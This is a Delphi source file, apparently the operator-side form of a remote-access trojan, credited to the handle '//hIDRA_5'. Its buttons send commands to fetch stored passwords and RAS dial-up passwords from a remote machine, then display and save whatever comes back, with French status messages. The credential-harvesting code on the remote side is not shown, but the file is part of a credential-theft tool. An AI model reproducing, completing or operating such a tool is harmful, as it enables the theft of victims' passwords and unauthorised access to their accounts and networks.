(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untPasswords.pas                                ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Passwords form                   ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untPasswords;

interface

uses
  Controls, Forms, StdCtrls, Buttons, ComCtrls, Classes;

type
  TfrmPasswords = class(TForm)
    SpdGetPass: TSpeedButton;
    RichPasswords: TRichEdit;
    SpdSave: TSpeedButton;
    SpdClear: TSpeedButton;
    SpdGetRAS: TSpeedButton;
    procedure SpdGetPassClick(Sender: TObject);
    procedure SpdSaveClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure SpdClearClick(Sender: TObject);
    procedure SpdGetRASClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmPasswords: TfrmPasswords;

implementation

{$R *.DFM}
uses untMain, untCommands;

procedure TfrmPasswords.SpdGetPassClick(Sender: TObject);
begin
   RichPasswords.Lines.Clear;
   frmMain.strStatus:='Reception des passwords...';
   frmMain.SendCommand(COMMAND_GET_PASSWORDS,'');
end;

procedure TfrmPasswords.SpdSaveClick(Sender: TObject);
begin
   frmMain.SaveLines(RichPasswords);
end;

procedure TfrmPasswords.FormCreate(Sender: TObject);
begin
   Caption:='Get passwords';
end;

procedure TfrmPasswords.SpdClearClick(Sender: TObject);
begin
   RichPasswords.Text:='';
end;

procedure TfrmPasswords.SpdGetRASClick(Sender: TObject);
begin
   RichPasswords.Lines.Clear;
   frmMain.strStatus:='Reception RAS...';
   frmMain.SendCommand(COMMAND_GET_RAS_PWDS,'');
end;

end.
